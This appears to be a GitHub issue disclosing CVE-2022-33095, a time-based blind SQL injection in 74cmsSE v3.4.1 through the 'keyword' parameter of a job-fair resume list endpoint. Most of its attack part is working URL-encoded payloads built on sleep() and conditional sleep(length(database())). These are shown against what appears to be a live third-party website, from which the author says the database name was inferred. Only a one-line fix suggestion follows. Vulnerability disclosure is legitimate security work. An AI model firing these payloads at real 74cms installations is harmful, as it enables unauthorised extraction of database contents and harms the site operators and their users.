CVE-2022-33095: SQL Injection vulnerability · Issue #5 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version：74cmsSE_v3.4.1
Download link：http://www.74cms.com/downloadse/show/id/62.html
Vulnerability Description:
74cmsSE_v3.4.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.

POC:
Payload：
/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select(0)from(select(sleep(2)))v)%2B%27/
In the path
/v1_0/home/jobfairol/resumelist
is not strictly filtered for $keyword, resulting in SQL injection
exp1:
https://www.jllxg.com/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select(0)from(select(sleep(2)))v)%2B%27

As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above, it is possible that the sleep() function being executed once.
Time blinds are possible to guess the length of the database:
exp2:
https://www.jllxg.com/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27

As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is “hsjp” , and the delay is exactly the length of database(), so the injection is successfull

It’s a time-based SQL injection
Suggest: Add a filter function to this parameter